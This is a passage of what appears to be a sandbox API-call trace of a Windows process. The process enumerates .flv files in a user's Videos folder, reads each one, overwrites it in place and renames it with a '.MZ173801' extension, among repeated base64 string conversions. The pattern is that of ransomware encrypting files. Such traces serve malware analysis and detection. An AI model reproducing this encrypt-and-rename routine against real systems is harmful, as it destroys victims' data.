lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.435] GetCurrentThreadId () returned 0x1358 [0120.435] GetCurrentThreadId () returned 0x1358 [0120.435] GetCurrentThreadId () returned 0x1358 [0120.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.436] GetCurrentThreadId () returned 0x1358 [0120.436] GetCurrentThreadId () returned 0x1358 [0120.436] GetCurrentThreadId () returned 0x1358 [0120.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\zR2L-Z.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zr2l-z.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0120.436] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0120.436] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.436] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x16a89 [0120.437] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.437] ReadFile (in: hFile=0x408, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x16a89, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f418*=0x16a89, lpOverlapped=0x0) returned 1 [0120.438] CloseHandle (hObject=0x408) returned 1 [0120.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\zR2L-Z.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zr2l-z.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0120.442] WriteFile (in: hFile=0x408, lpBuffer=0x23bc7d0*, nNumberOfBytesToWrite=0x16a89, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23bc7d0*, lpNumberOfBytesWritten=0x19f424*=0x16a89, lpOverlapped=0x0) returned 1 [0120.453] CloseHandle (hObject=0x408) returned 1 [0120.456] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\zR2L-Z.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zr2l-z.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\zR2L-Z.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zr2l-z.flv.mz173801")) returned 1 [0120.456] GetCurrentThreadId () returned 0x1358 [0120.457] GetCurrentThreadId () returned 0x1358 [0120.457] GetCurrentThreadId () returned 0x1358 [0120.457] GetCurrentThreadId () returned 0x1358 [0120.457] GetCurrentThreadId () returned 0x1358 [0120.457] GetCurrentThreadId () returned 0x1358 [0120.457] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51a28f0, ftCreationTime.dwHighDateTime=0x1d5e2bf, ftLastAccessTime.dwLowDateTime=0x32ae0f20, ftLastAccessTime.dwHighDateTime=0x1d5eaf6, ftLastWriteTime.dwLowDateTime=0x32ae0f20, ftLastWriteTime.dwHighDateTime=0x1d5eaf6, nFileSizeHigh=0x0, nFileSizeLow=0x1055a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ZrVO9ZIsn.flv", cAlternateFileName="ZRVO9Z~1.FLV")) returned 1 [0120.457] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.457] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ZrVO9ZIsn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zrvo9zisn.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51a28f0, ftCreationTime.dwHighDateTime=0x1d5e2bf, ftLastAccessTime.dwLowDateTime=0x32ae0f20, ftLastAccessTime.dwHighDateTime=0x1d5eaf6, ftLastWriteTime.dwLowDateTime=0x32ae0f20, ftLastWriteTime.dwHighDateTime=0x1d5eaf6, nFileSizeHigh=0x0, nFileSizeLow=0x1055a)) returned 1 [0120.457] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.457] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] GetCurrentThreadId () returned 0x1358 [0120.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ZrVO9ZIsn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zrvo9zisn.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0120.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0120.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1055a [0120.459] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.459] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x1055a, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x1055a, lpOverlapped=0x0) returned 1 [0120.460] CloseHandle (hObject=0x408) returned 1 [0120.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ZrVO9ZIsn.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zrvo9zisn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 